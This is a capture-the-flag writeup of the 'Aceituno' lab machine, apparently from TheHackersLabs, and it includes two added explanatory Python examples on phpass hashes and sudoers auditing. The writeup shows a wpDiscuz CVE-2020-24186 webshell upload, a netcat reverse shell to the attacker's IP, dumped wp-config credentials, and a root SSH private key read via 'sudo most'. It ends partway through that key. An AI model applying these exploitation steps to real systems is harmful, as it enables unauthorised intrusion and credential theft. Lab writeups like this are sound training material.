TheHackersLabs - Aceituno Machine Writeup
城南花已开 Lv5

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.156 08:00:27:df:bb:e7 (Unknown)
192.168.60.254 00:50:56:e0:e6:12 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.951 seconds (131.21 hosts/sec). 4 responded
export ip=192.168.60.156
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.156:22
Open 192.168.60.156:80
Open 192.168.60.156:443
Open 192.168.60.156:3306
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 22:28 CST
Initiating ARP Ping Scan at 22:28
Scanning 192.168.60.156 [1 port]
Completed ARP Ping Scan at 22:28, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:28
Completed Parallel DNS resolution of 1 host. at 22:28, 0.05s elapsed
DNS resolution of 1 IPs took 0.05s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:28
Scanning 192.168.60.156 [4 ports]
Discovered open port 3306/tcp on 192.168.60.156
Discovered open port 443/tcp on 192.168.60.156
Discovered open port 22/tcp on 192.168.60.156
Discovered open port 80/tcp on 192.168.60.156
Completed SYN Stealth Scan at 22:28, 0.04s elapsed (4 total ports)
Nmap scan report for 192.168.60.156
Host is up, received arp-response (0.00081s latency).
Scanned at 2025-01-16 22:28:46 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
443/tcp open https syn-ack ttl 64
3306/tcp open mysql syn-ack ttl 64
MAC Address: 08:00:27:DF:BB:E7 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

Visiting port 80 redirects to a domain name, so add it to the hosts file:

sudo vim /etc/hosts
192.168.60.156 aceituno.thl

Opening it in the browser shows that it is a WordPress site.


A wpscan run turns up two users: aceituno and Aceituno.

❯ wpscan --url http://aceituno.thl -e u,ap --api-token "换成自己的API"
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://aceituno.thl/ [192.168.60.156]
[+] Started: Thu Jan 16 22:43:18 2025

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.59 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] robots.txt found: http://aceituno.thl/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://aceituno.thl/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://aceituno.thl/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://aceituno.thl/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.5.2 identified (Insecure, released on 2024-04-09).
| Found By: Rss Generator (Passive Detection)
| - http://aceituno.thl/feed/, <generator>https://wordpress.org/?v=6.5.2</generator>
| - http://aceituno.thl/comments/feed/, <generator>https://wordpress.org/?v=6.5.2</generator>
|
| [!] 3 vulnerabilities identified:
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API
| Fixed in: 6.5.5
| References:
| - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block
| Fixed in: 6.5.5
| References:
| - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block
| Fixed in: 6.5.5
| References:
| - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/

[+] WordPress theme in use: blogxo
| Location: http://aceituno.thl/wp-content/themes/blogxo/
| Last Updated: 2024-05-28T00:00:00.000Z
| Readme: http://aceituno.thl/wp-content/themes/blogxo/readme.txt
| [!] The version is out of date, the latest version is 0.5
| Style URL: http://aceituno.thl/wp-content/themes/blogxo/style.css?ver=6.5.2
| Style Name: Blogxo
| Style URI: https://themeansar.com/free-themes/blogxo/
| Description: Blogxo is a fast, clean, modern-looking Best Responsive News Magazine WordPress theme. The theme is ...
| Author: Themeansar
| Author URI: https://themeansar.com
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 0.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://aceituno.thl/wp-content/themes/blogxo/style.css?ver=6.5.2, Match: 'Version: 0.4'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <> (0 / 10) 0.00% ETA: ??:??:? Brute Forcing Author IDs - Time: 00:00:00 <> (1 / 10) 10.00% ETA: 00:00:0 Brute Forcing Author IDs - Time: 00:00:00 <> (2 / 10) 20.00% ETA: 00:00:0 Brute Forcing Author IDs - Time: 00:00:00 <> (5 / 10) 50.00% ETA: 00:00:0 Brute Forcing Author IDs - Time: 00:00:00 <> (6 / 10) 60.00% ETA: 00:00:0 Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] aceituno
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://aceituno.thl/wp-json/wp/v2/users/?per_page=100&page=1
| Author Sitemap (Aggressive Detection)
| - http://aceituno.thl/wp-sitemap-users-1.xml
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] Aceituno
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Rss Generator (Aggressive Detection)

[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 2
| Requests Remaining: 20

[+] Finished: Thu Jan 16 22:43:25 2025
[+] Requests Done: 55
[+] Cached Requests: 8
[+] Data Sent: 13.953 KB
[+] Data Received: 419.225 KB
[+] Memory used: 272.965 MB
[+] Elapsed time: 00:00:06

WordPress Plugin Scan

I tried brute-forcing the user names without result, so I scanned again with plugin detection switched to aggressive mode. That is much slower; the scan took me half an hour.

❯ wpscan --url http://aceituno.thl -e u,ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://aceituno.thl/ [192.168.60.156]
[+] Started: Thu Jan 16 23:13:02 2025

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.59 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] robots.txt found: http://aceituno.thl/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://aceituno.thl/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://aceituno.thl/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://aceituno.thl/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.5.2 identified (Insecure, released on 2024-04-09).
| Found By: Rss Generator (Passive Detection)
| - http://aceituno.thl/feed/, <generator>https://wordpress.org/?v=6.5.2</generator>
| - http://aceituno.thl/comments/feed/, <generator>https://wordpress.org/?v=6.5.2</generator>

[+] WordPress theme in use: blogxo
| Location: http://aceituno.thl/wp-content/themes/blogxo/
| Last Updated: 2024-05-28T00:00:00.000Z
| Readme: http://aceituno.thl/wp-content/themes/blogxo/readme.txt
| [!] The version is out of date, the latest version is 0.5
| Style URL: http://aceituno.thl/wp-content/themes/blogxo/style.css?ver=6.5.2
| Style Name: Blogxo
| Style URI: https://themeansar.com/free-themes/blogxo/
| Description: Blogxo is a fast, clean, modern-looking Best Responsive News Magazine WordPress theme. The theme is ...
| Author: Themeansar
| Author URI: https://themeansar.com
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 0.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://aceituno.thl/wp-content/themes/blogxo/style.css?ver=6.5.2, Match: 'Version: 0.4'

[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:36:11 <==================================================================> (108632 / 108632) 100.00% Time: 00:36:11
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
| Location: http://aceituno.thl/wp-content/plugins/akismet/
| Latest Version: 5.3.5
| Last Updated: 2024-11-19T02:02:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://aceituno.thl/wp-content/plugins/akismet/, status: 403
|
| The version could not be determined.

[+] feed
| Location: http://aceituno.thl/wp-content/plugins/feed/
|
| Found By: Known Locations (Aggressive Detection)
| - http://aceituno.thl/wp-content/plugins/feed/, status: 200
|
| The version could not be determined.

[+] wpdiscuz
| Location: http://aceituno.thl/wp-content/plugins/wpdiscuz/
| Last Updated: 2024-10-14T17:02:00.000Z
| Readme: http://aceituno.thl/wp-content/plugins/wpdiscuz/readme.txt
| [!] The version is out of date, the latest version is 7.6.27
|
| Found By: Known Locations (Aggressive Detection)
| - http://aceituno.thl/wp-content/plugins/wpdiscuz/, status: 200
|
| Version: 7.0.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://aceituno.thl/wp-content/plugins/wpdiscuz/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] aceituno
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://aceituno.thl/wp-json/wp/v2/users/?per_page=100&page=1
| Author Sitemap (Aggressive Detection)
| - http://aceituno.thl/wp-sitemap-users-1.xml
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] Aceituno
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Rss Generator (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Jan 16 23:49:21 2025
[+] Requests Done: 108675
[+] Cached Requests: 40
[+] Data Sent: 29.076 MB
[+] Data Received: 30.515 MB
[+] Memory used: 482.766 MB
[+] Elapsed time: 00:36:19

PoC Exploitation

The wpdiscuz plugin is version 7.0.4, and a search online turns up an RCE PoC for that version.

It is a comment plugin, and this version allows any file to be uploaded remotely.

hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE: wpDiscuz 7.0.4 Remote Code Execution

Let's try it.

❯ git clone https://github.com/hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE.git
Cloning into 'CVE-2020-24186-wpDiscuz-7.0.4-RCE'...
remote: Enumerating objects: 34, done.
remote: Counting objects: 100% (34/34), done.
remote: Compressing objects: 100% (31/31), done.
remote: Total 34 (delta 4), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (34/34), 154.43 KiB | 237.00 KiB/s, done.
Resolving deltas: 100% (4/4), done.
cd CVE-2020-24186-wpDiscuz-7.0.4-RCE
❯ python3 wpDiscuz_RemoteCodeExec.py -u http://aceituno.thl -p /2024/04/23/hola-mundo
---------------------------------------------------------------
[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox
---------------------------------------------------------------

[+] Response length:[97732] | code:[200]
[!] Got wmuSecurity value: 27b9b4f615
[!] Got wmuSecurity value: 1

[+] Generating random name for Webshell...
[!] Generated webshell name: wkjyxbtkicuaczw

[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:http://aceituno.thl/wp-content/uploads/2025/01/wkjyxbtkicuaczw-1737043183.5437.php

> id


uid=33(www-data) gid=33(www-data) groups=33(www-data)

That gives us a shell.

The web shell is awkward to work in, so I spawn a reverse shell.

There is a user named aceituno.

> busybox nc 192.168.60.100 4444 -e sh
--------------separator-----------------------
❯ pwncat-cs -lp 4444
[00:01:10] Welcome to pwncat 🐈! __main__.py:164
[00:01:36] received connection from 192.168.60.156:42742 bind.py:84
[00:01:36] 0.0.0.0:4444: upgrading from /usr/bin/dash to manager.py:957
/usr/bin/bash
[00:01:37] 192.168.60.156:42742: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@Aceituno:/var/www$ cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
aceituno:x:1000:1000:aceituno,,,:/home/aceituno:/bin/bash

Port 3306 is open locally, but we do not know the password.

Let's look at the WordPress configuration file and connect to the database with it.

(remote) www-data@Aceituno:/var/www/html/wordpress$ cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/documentation/article/editing-wp-config-php/
*
* @package WordPress
*/

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'wp_user' );

/** Database password */
define( 'DB_PASSWORD', 'Tomamoreno' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'e*Ouzl9IQttH;rTl{Cxgr7_1C.OFKuq#(| Y8uRwIS?]l;k?pFivUzO^~NAvxk)L' );
define( 'SECURE_AUTH_KEY', 'PK;>d&ltu$Hq5F$EfH2 <_]3&cm>;@J}sy/pFBrthS-r*(&|^Lj:k&5^8yv9rdAk' );
define( 'LOGGED_IN_KEY', ')~){g24dF!5BSI[<u[|}k6z yrz85/%t$jvMU$v%xhuj<!4(;n`KG|@1hazNGl{.' );
define( 'NONCE_KEY', '&)]3#r1f3oo{9taKv9+/fV)sO!7L3LUU#^`Ht1>OUU31|ae>HxZpuKCBVu1V,$1L' );
define( 'AUTH_SALT', 'akQnq #ZcubeXF9[S-)8[)j&EO7M4-^&=j%HPk`5#gr9-zfB#1n(H/hR_QH>>hQN' );
define( 'SECURE_AUTH_SALT', 'ft:Uy;O8$A>?%aPbjgEak;%V9:j]3?YDRM}{0m<ts),J&2O#XD`y/]n~tG-aRn^t' );
define( 'LOGGED_IN_SALT', 'H4J3weFe|i#SD2}@FjuBdfYJ+8V&i!1Uasrv7bW,(o-Kg||^cY0~;i?Ap{ur^Pde' );
define( 'NONCE_SALT', '&[PO4V~#JDGLR&Yk]^fCWh;V0A/+fTSB}_;KvTzuUF1Y;1u1#Bdyr^NrDgqwBi:.' );

/**#@-*/

/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/documentation/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

(remote) www-data@Aceituno:/var/www/html/wordpress$ mysql -u wp_user -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 169683
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| wordpress |
+--------------------+
2 rows in set (0.000 sec)

MariaDB [(none)]> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> show tables;
+-----------------------------+
| Tables_in_wordpress |
+-----------------------------+
| pelopicopata |
| wp_commentmeta |
| wp_comments |
| wp_gwolle_gb_entries |
| wp_gwolle_gb_log |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
| wp_wc_avatars_cache |
| wp_wc_comments_subscription |
| wp_wc_feedback_forms |
| wp_wc_follow_users |
| wp_wc_phrases |
| wp_wc_users_rated |
| wp_wc_users_voted |
+-----------------------------+
22 rows in set (0.000 sec)

MariaDB [wordpress]> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| Aceituno | $P$BNyfR9lcn/QsR0fTPD3vUVkVUyg6AJ. |
+------------+------------------------------------+
1 row in set (0.000 sec)

We have the hash; I tried to crack it, but, unexpectedly, it would not crack.

I had overlooked one table: pelopicopata.
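The $P$ prefix marks a phpass "portable" hash, the format WordPress has used for wp_users.user_pass for years. The character after $P$ encodes the cost: 'B' is index 13 in phpass' alphabet, so each guess costs 8193 MD5 computations (one over salt + password, then 2^13 chained rounds), and the next 8 characters are a per-user salt, so no rainbow table applies. The Python below is an added example, not the writeup's code and not the phpass library itself: it re-implements the portable algorithm, parses the hash dumped above into its parts, and verifies a password against a hash. The password hashed at the end is constructed for the demonstration; the machine's real password is not known to this example.

```python
import hashlib
import hmac
import os

# phpass uses its own 64-character alphabet, not standard base64.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# The wp_users hash dumped on this machine (copied from the page above).
PAGE_HASH = "$P$BNyfR9lcn/QsR0fTPD3vUVkVUyg6AJ."


def encode64(data, count):
    """phpass' custom base64: 16 digest bytes become 22 characters."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def parse_setting(setting):
    """Split '$P$' + cost char + 8-char salt [+ 22-char digest] into its parts."""
    if len(setting) not in (12, 34) or setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("unsupported iteration count")
    return count_log2, setting[4:12], setting[12:]


def crypt_private(password, setting):
    """Recompute the hash: md5(salt + pw), then 2^cost rounds of md5(prev + pw)."""
    count_log2, salt, _ = parse_setting(setting)
    pw = password.encode("utf-8")
    digest = hashlib.md5(salt.encode("ascii") + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + encode64(digest, 16)


def check_password(password, stored):
    """Constant-time comparison of the recomputed hash with the stored one."""
    return hmac.compare_digest(crypt_private(password, stored), stored)


def make_hash(password, salt=None, count_log2=13):
    """Hash the way WordPress does: cost 13 ('B') and an 8-character itoa64 salt."""
    if salt is None:
        salt = encode64(os.urandom(6), 6)
    if len(salt) != 8 or any(c not in ITOA64 for c in salt):
        raise ValueError("salt must be 8 itoa64 characters")
    return crypt_private(password, "$P$" + ITOA64[count_log2] + salt)


if __name__ == "__main__":
    cost, salt, _ = parse_setting(PAGE_HASH)
    print(f"cost 2^{cost} = {1 << cost} MD5 rounds per guess, salt {salt}")
    demo = make_hash("example-passphrase")  # constructed password, not the machine's
    print(demo, check_password("example-passphrase", demo))
```

The work factor explains why a wordlist attack on a single $P$B hash is slow and why it simply stops when the password is not in the list; for a site owner the takeaway is the reverse one: the salt and 8192 rounds only help if the password itself is not guessable, and newer WordPress releases have moved user hashes to bcrypt.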

MariaDB [wordpress]> show tables;
+-----------------------------+
| Tables_in_wordpress |
+-----------------------------+
| pelopicopata |
| wp_commentmeta |
| wp_comments |
| wp_gwolle_gb_entries |
| wp_gwolle_gb_log |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
| wp_wc_avatars_cache |
| wp_wc_comments_subscription |
| wp_wc_feedback_forms |
| wp_wc_follow_users |
| wp_wc_phrases |
| wp_wc_users_rated |
| wp_wc_users_voted |
+-----------------------------+
22 rows in set (0.000 sec)

MariaDB [wordpress]> select * from pelopicopata;
+----------+------------------+
| usuario | contrasea |
+----------+------------------+
| aceituno | ElSeorDeLaNoche |
+----------+------------------+
1 row in set (0.000 sec)

Finally a password, and yet for a long while I still could not log in with it.

Only after reading another writeup did I learn that the password is a Spanish phrase.


I do not know why the MySQL query output does not show this special character.

ElSeñorDeLaNoche

❯ ssh aceituno@$ip
aceituno@192.168.60.156's password:
Permission denied, please try again.
aceituno@192.168.60.156's password:
Linux Aceituno 6.1.0-20-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.85-1 (2024-04-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 28 12:09:03 2024 from 192.168.0.108
aceituno@Aceituno:~$ cat user.txt
f6cf451a8f0f8c14fd0a54e08b99b69c

Root Privilege Escalation

File Read

The user has sudo rights:

aceituno@Aceituno:~$ sudo -l
Matching Defaults entries for aceituno on Aceituno:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User aceituno may run the following commands on Aceituno:
(root) NOPASSWD: /usr/bin/most

I looked up ways to abuse most. I had assumed it could run commands, but it turns out it cannot.

most is a program commonly found on Unix and Unix-like systems. It is a pager used to view file contents. Like less, most lets you read a file page by page instead of printing everything to the screen at once, so long files and command output can be read comfortably without loading the whole file, which saves memory and is more efficient.

However, I found a private key file in root's home directory.
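A pager run as root with NOPASSWD is a classic sudoers mistake: even without a command escape, the program reads any file root can read, and most's editor key (discussed at the end of this writeup) turns it into a shell. The Python below is an added audit example, not part of the writeup, that parses the sudo -l output shown above (used here as the sample input) and flags entries a reviewer would question: root as the run-as user, NOPASSWD, and interactive pagers or editors. The second, constructed sample shows sudo's NOEXEC tag, which for dynamically linked programs prevents the command from launching further programs and so closes the editor/shell escape.

```python
import re

# `sudo -l` output as printed on this page, used here as the sample input.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for aceituno on Aceituno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User aceituno may run the following commands on Aceituno:
    (root) NOPASSWD: /usr/bin/most
"""

# Constructed variant using sudo's NOEXEC tag, which stops the command from
# executing further programs and so blocks editor/shell escapes.
HARDENED_OUTPUT = """
User aceituno may run the following commands on Aceituno:
    (root) NOEXEC: /usr/bin/most
"""

# Interactive pagers/editors that can hand the user an editor or a shell from
# inside the program; most's 'e' key on this machine is one instance.
INTERACTIVE_TEXT_TOOLS = {"most", "less", "more", "vi", "vim", "view", "nano", "emacs"}

# "(runas) TAG: TAG: cmd1, cmd2"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Turn the 'may run the following commands' section into one dict per command."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True
            continue
        if not in_cmds or not line.strip():
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # "(user : group)" -> user
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            entries.append({"runas": runas, "tags": tags, "command": cmd.strip()})
    return entries


def assess(entry):
    """Return the review findings for one sudoers entry (empty list = nothing notable)."""
    cmd = entry["command"]
    findings = []
    exe = None
    if cmd == "ALL":
        findings.append("unrestricted command list")
    else:
        exe = cmd.split()[0].rsplit("/", 1)[-1]
    if exe in INTERACTIVE_TEXT_TOOLS:
        if "NOEXEC" in entry["tags"]:
            findings.append(f"{exe} is interactive, but NOEXEC blocks its editor/shell escape")
        else:
            findings.append(f"{exe} is an interactive pager/editor with an editor or shell escape")
    if "NOPASSWD" in entry["tags"]:
        findings.append("NOPASSWD: no password is required")
    if entry["runas"] in ("root", "ALL"):
        findings.append(f"runs as {entry['runas']}")
    return findings


def audit(text):
    """Pair every parsed entry with its findings."""
    return [(e["command"], assess(e)) for e in parse_sudo_l(text)]


if __name__ == "__main__":
    for label, text in (("machine", SUDO_L_OUTPUT), ("hardened", HARDENED_OUTPUT)):
        for command, findings in audit(text):
            print(label, command, findings)
```

The real fix is narrower than a tag, of course: a user who needs to read specific files as root should get a wrapper that reads exactly those files, not a general-purpose pager.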

aceituno@Aceituno:~$ sudo /usr/bin/most /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABAqVNwfIr
sulKah6wYV7i/NAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQC7ZLjoCWvQ
XxRgojyRlr6GA6GdrtRBwD5Z5tB7JvdrT2AE0G0uTCcCsaeFEzkPzIehiTSCM74Qra0IFB
